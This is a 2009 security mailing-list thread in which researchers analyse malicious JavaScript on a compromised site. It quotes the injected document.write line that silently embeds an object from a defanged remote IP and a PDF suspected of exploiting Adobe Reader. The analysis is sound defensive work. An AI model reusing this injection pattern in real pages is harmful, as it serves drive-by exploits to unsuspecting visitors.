You beat me to it. -ChrisAM
On Fri, Apr 17, 2009 at 6:31 PM, Paul Ferguson <fergdawgs...@gmail.com> wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> On Fri, Apr 17, 2009 at 3:15 PM, Paul Ferguson <fergdawgs...@gmail.com>
> wrote:
>
>>
>> On Fri, Apr 17, 2009 at 3:06 PM, Chris Mills <securin...@gmail.com>
>> wrote:
>>
>>> I took a quick look at the code... formatted it in a pastebin here:
>>> http://pastebin.com/m7b50be54
>>>
>>> That JavaScript writes this to the page (URL obscured):
>>> document.write("<embed
>>> src=\"hXXp://77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown|
>>> Unknown|US|1.2.3.4\" width=\"0\" height=\"0\"
>>> type=\"application/pdf\"></embed>");
>>>
>>> The 1.2.3.4 in the URL is my public IP address (I changed that).
>>>
>>> Below the JavaScript, it grabs a PDF:
>>> <embed src="include/two.pdf" width="1" height="0"
>>> style="border:none"></embed>
>>>
>>> That PDF is on the site, I haven't looked at it yet though.
>>>
>>
>> Most likely a file that exploits a well-known vulnerability in Adobe
>> Reader, which in turn probably loads malware from yet another location.
>>
>> We've been seeing a lot of this lately.
>>
>
> Yes, definitely malicious:
>
> http://www.virustotal.com/analisis/89db7dec6cc786227462c947e4cb4a9b
>
> - - ferg
>
> -----BEGIN PGP SIGNATURE-----
> Version: PGP Desktop 9.5.3 (Build 5003)
>
> wj8DBQFJ6QMwq1pz9mNUZTMRAqJZAKCEkD0KcifnJIhtex4nP6grIFGKzwCgnE1w
> /K0hKsJiAz4RGu8VQkyP+js=
> =AzJq
> -----END PGP SIGNATURE-----
>
>
> --
> "Fergie", a.k.a. Paul Ferguson
> Engineering Architecture for the Internet
> fergdawgster(at)gmail.com
> ferg's tech blog: http://fergdawg.blogspot.com/